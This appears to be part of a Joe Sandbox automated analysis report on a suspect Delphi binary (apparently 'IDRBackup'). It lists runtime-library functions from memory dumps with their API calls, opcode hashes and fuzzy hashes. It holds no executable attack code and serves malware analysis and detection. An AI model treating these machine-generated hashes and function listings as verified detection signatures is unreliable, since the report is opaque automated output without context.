                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$String$RaiseRecxiSysutils@Unicode$Except$qqrvException@$bctr$qqrp20Recpx14$ArrayAsg$qqrr20ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqrvList$qqrvLoadMetaString$qqrp20Stringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 3821477130-0
                                                                                                  • Opcode ID: 6794b4ce728eecb1be617316dc056fb23afa01cf88d41e19089f0a14d68d1b4a
                                                                                                  • Instruction ID: 21677f4addc5a171223aa9ddaed8cff462ef7dd7c704c93449bad3491d56d0ce
                                                                                                  • Opcode Fuzzy Hash: 6794b4ce728eecb1be617316dc056fb23afa01cf88d41e19089f0a14d68d1b4a
                                                                                                  • Instruction Fuzzy Hash: 81F0A4301067819BE320DB59FDD2B9A73E0AB55328F14852EE54947291D6327C4487A2
                                                                                                  Function 5002C0CC Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C0D9
                                                                                                  • @System@TObject@$bctr$qqrv.RTL120 ref: 5002C0E8
                                                                                                  • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120 ref: 5002C0F9
                                                                                                  • @Sysutils@TStringBuilder@Append$qqrx20System@UnicodeString.RTL120 ref: 5002C107
                                                                                                  • @System@@AfterConstruction$qqrp14System@TObject.RTL120 ref: 5002C112
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$String$System@@Sysutils@$AfterAppend$qqrx20Builder@Builder@set_Capacity$qqriClassClassoConstruction$qqrp14Create$qqrp17MetaObjectObject@$bctr$qqrvUnicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2859721611-0
                                                                                                  • Opcode ID: 21f0d74a83fb4ff8832bd7025fe4923f79583aba0890a39072b30d0fc51a864e
                                                                                                  • Instruction ID: 39a3893f9b0b29f08e61ee327ab757ae22a9345e4dc45241c438b3d4ad3786ae
                                                                                                  • Opcode Fuzzy Hash: 21f0d74a83fb4ff8832bd7025fe4923f79583aba0890a39072b30d0fc51a864e
                                                                                                  • Instruction Fuzzy Hash: 9CF0A773B02581579300D6AEBC81A6AB68B9BD5670B188332F52CC7386DB268C1246E5
                                                                                                  Function 500243A4 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$StringSystem@System@@$EnsureString$qqrr20$AnsiFromInternalLen$qqrx20Str$qqrr20Stringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 3020172278-0
                                                                                                  • Opcode ID: 6cdf5f7169a857eab86092ba583cd5dfa0d9c452280a2cdb4edc37c4faf4d93b
                                                                                                  • Instruction ID: 8a90345f6e56a0fa8899a303c97709957ae8c098f7633a4adecdb0ccf3c4c27c
                                                                                                  • Opcode Fuzzy Hash: 6cdf5f7169a857eab86092ba583cd5dfa0d9c452280a2cdb4edc37c4faf4d93b
                                                                                                  • Instruction Fuzzy Hash: 5DF0F031406289EFE755EFA4E8929ACB3F8EF183007A146B7E80093121E7702F00D692
                                                                                                  Function 5002D19C Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@DynArrayAddRef$qqrv.RTL120(?,?,00000000), ref: 5002D1AA
                                                                                                  • @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%.RTL120(00000000,5002D201,?,?,?,00000000), ref: 5002D1C5
                                                                                                    • Part of subcall function 5002DC14: @System@@DynArrayLength$qqrv.RTL120(?,?,?,5002D1CA,00000000,5002D201,?,?,?,00000000), ref: 5002DC1F
                                                                                                    • Part of subcall function 5002DC14: @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,00000000,?,?,?,5002D1CA,00000000,5002D201,?,?,?,00000000), ref: 5002DC2C
                                                                                                  • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%.RTL120(00000000,5002D201,?,?,?,00000000), ref: 5002D1D2
                                                                                                    • Part of subcall function 5002D730: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                    • Part of subcall function 5002D730: @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                    • Part of subcall function 5002D730: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                    • Part of subcall function 5002D730: @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D208,?,?,00000000), ref: 5002D1ED
                                                                                                    • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                    • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D208,?,?,00000000), ref: 5002D1FB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$ArrayDynamicSystem@%$Encoding@Sysutils@$Length$qqrv$Array$tb%Bytes$qqrx24Chars$qqrx25Clear$qqrrpvpv$Array$qqrpvt1uiArray$tb%iir25Array$tuc%Array$tuc%iArray$tuc%iiByteCount$qqrx24FinalizeFreeMem$qqrpvRef$qqrv
                                                                                                  • String ID:
                                                                                                  • API String ID: 124126621-0
                                                                                                  • Opcode ID: 9a55dd426d69212cea5294c82b78c0f17d40f7f65fb3b2c228ee3267651922e4
                                                                                                  • Instruction ID: ea8ea964c1ccbf4185af528d9a84d920c2f529ad8815d3faa1f173e3987db8ef
                                                                                                  • Opcode Fuzzy Hash: 9a55dd426d69212cea5294c82b78c0f17d40f7f65fb3b2c228ee3267651922e4
                                                                                                  • Instruction Fuzzy Hash: DBF0C234205548EFDB04DF90FC91D4973A9EB58310BA18277FC0883711D630EE02C590
                                                                                                  Function 5001B8F0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InitializeRecord$qqrpvt1.RTL120 ref: 5001B905
                                                                                                    • Part of subcall function 5000AE00: @System@@InitializeArray$qqrpvt1ui.RTL120 ref: 5000AE24
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B958), ref: 5001B920
                                                                                                  • @System@EnumResourceModules$qqrpqqripv$opv.RTL120(00000000,5001B958), ref: 5001B92D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B958), ref: 5001B937
                                                                                                  • @System@@FinalizeRecord$qqrpvt1.RTL120(5001B95F), ref: 5001B952
                                                                                                    • Part of subcall function 5000AED8: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,?,?,50006C67,?,?,50006BAA), ref: 5000AEFC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$Unicode$Array$qqrpvt1uiAsg$qqrr20FinalizeInitializeRecord$qqrpvt1StringStringx20$EnumModules$qqrpqqripv$opvResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 2269274692-0
                                                                                                  • Opcode ID: c6deeecd6d38e02dca0c240106d8acc9fad9f78a616a536245d8c20f9f784f3c
                                                                                                  • Instruction ID: ba510fcea000b4b5886386029a871e670e821f6a008f22ad42f0b1393bee6191
                                                                                                  • Opcode Fuzzy Hash: c6deeecd6d38e02dca0c240106d8acc9fad9f78a616a536245d8c20f9f784f3c
                                                                                                  • Instruction Fuzzy Hash: 59F096315012889FEB11EBA8DD9289E77EDDBD9610B958773E50093611EB305E45C6D0
                                                                                                  Function 50022CAC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@StrNextChar$qqrpxb.RTL120 ref: 50022D1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrpxbNextSysutils@
                                                                                                  • String ID: H
                                                                                                  • API String ID: 518225700-2852464175
                                                                                                  • Opcode ID: 3881d23d7963acc15f078cbd6bcd5a4cef927f5d022d7b8b47876acc1e4f8649
                                                                                                  • Instruction ID: 3ee87861289b317458a83a3163a221fe271f487816919179d3279f33b21b68a3
                                                                                                  • Opcode Fuzzy Hash: 3881d23d7963acc15f078cbd6bcd5a4cef927f5d022d7b8b47876acc1e4f8649
                                                                                                  • Instruction Fuzzy Hash: F231813091668A9BDF11DFE8E8447EEB7F4FF05320F504266E804A72A2D3785A45CBB5
                                                                                                  Function 50003980 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 50003991
                                                                                                  • VirtualQuery.KERNEL32(00000000,?,0000001C), ref: 50003A25
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrpvibFillQuerySystem@@Virtual
                                                                                                  • String ID: <JP$jP
                                                                                                  • API String ID: 2244405464-1976356052
                                                                                                  • Opcode ID: d4214674cb1b790d79c068eba0a754b99b72d6d1fa264546a80965101dd17e03
                                                                                                  • Instruction ID: bcffa789d984cc2227a1b944b815eb85179e7a29a5b5a1ae78bfe4e670926a00
                                                                                                  • Opcode Fuzzy Hash: d4214674cb1b790d79c068eba0a754b99b72d6d1fa264546a80965101dd17e03
                                                                                                  • Instruction Fuzzy Hash: 7C21DA357045C18FF326C69C98E078A779AE7D5250FA48769E1C58B286D7B0DC41C793
                                                                                                  Function 5000B95C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@_llumod$qqrv.RTL120(0000000A,00000000), ref: 5000B978
                                                                                                  • @System@@_lludiv$qqrv.RTL120(0000000A,00000000), ref: 5000B993
                                                                                                  • @System@@SetLength$qqrp28System@%SmallString$iuc$255%uc.RTL120 ref: 5000B9F2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Length$qqrp28SmallString$iuc$255%ucSystem@%System@@System@@_lludiv$qqrvSystem@@_llumod$qqrv
                                                                                                  • String ID: -
                                                                                                  • API String ID: 1433924716-2547889144
                                                                                                  • Opcode ID: fa2d9fa7220ae8a8b5e2127b09392bd41d7e1e4dd11ae780642dc36a45f227ea
                                                                                                  • Instruction ID: bc71e0da4f25463f64f7145e0403e3090bf30eba9254fb7a0d98b2b38cbe9050
                                                                                                  • Opcode Fuzzy Hash: fa2d9fa7220ae8a8b5e2127b09392bd41d7e1e4dd11ae780642dc36a45f227ea
                                                                                                  • Instruction Fuzzy Hash: 07115E25B043C91AF711AE65D4E178E7BD1DF91310F60C236ED488B3B2D6718C45C740
                                                                                                  Function 50011B70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 50011B75
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011BAF
                                                                                                  • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120 ref: 50011BE8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$CategoryCheckInitialize$qqrvLatin1$qqrbSeparator$qqr26Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 1352756909-3916222277
                                                                                                  • Opcode ID: e44d450cd53f43e8828d2ed6ef07b86b89c0741405600dd179bd049eff3e502c
                                                                                                  • Instruction ID: 5c27785dfc3468ab4fa8786a722348d709b28dd992ebe28e9874c880dfb8179b
                                                                                                  • Opcode Fuzzy Hash: e44d450cd53f43e8828d2ed6ef07b86b89c0741405600dd179bd049eff3e502c
                                                                                                  • Instruction Fuzzy Hash: D1F0C891F1D0A10BE7185A65EC903F463D2EB94302B8C427AE943CB2D2FB3988D5D320
                                                                                                  Function 500110D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 500110D5
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 500110E7
                                                                                                    • Part of subcall function 5001062C: FindResourceW.KERNEL32(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010640
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 5001064B
                                                                                                    • Part of subcall function 5001062C: LoadResource.KERNEL32(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010657
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010662
                                                                                                    • Part of subcall function 5001062C: LockResource.KERNEL32(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010668
                                                                                                    • Part of subcall function 5001062C: @Sysutils@RaiseLastOSError$qqrv.RTL120(00000000,?,00000000,?,CHARTABLE,0000000A,?,DC50006B,5000FB20,DC50006B), ref: 50010674
                                                                                                  • @Character@TCharacter@CheckSeparator$qqr26Character@TUnicodeCategory.RTL120 ref: 50011120
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Character@$Error$qqrvLastRaiseResourceSysutils@$CategoryCheckFindInitialize$qqrvLatin1$qqrbLoadLockSeparator$qqr26Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 305751366-3916222277
                                                                                                  • Opcode ID: ee0eee03fca6bd072fe399242877850c852a16c1db9b3c22b6777e204e8b1ebd
                                                                                                  • Instruction ID: 4cfc787b75a84d5a1d5c986ac9783fa5e206bb40ce50e3d6909b12ff5fbc43b5
                                                                                                  • Opcode Fuzzy Hash: ee0eee03fca6bd072fe399242877850c852a16c1db9b3c22b6777e204e8b1ebd
                                                                                                  • Instruction Fuzzy Hash: E2F0E991B254A14BE3184761EC612F463E2A394312B9C423EF993CB2D6DB3589E5E720
                                                                                                  Function 50012038 Relevance: 6.3, APIs: 4, Instructions: 314COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 84c94b66c65c3e9b87035ca3d27372d4e35400a0308ff6c0a7594b6a834fe7a0
                                                                                                  • Instruction ID: f29600500c8ce473a63ea4a4c58500fabea73661ee4b4393fbd01134744e99f1
                                                                                                  • Opcode Fuzzy Hash: 84c94b66c65c3e9b87035ca3d27372d4e35400a0308ff6c0a7594b6a834fe7a0
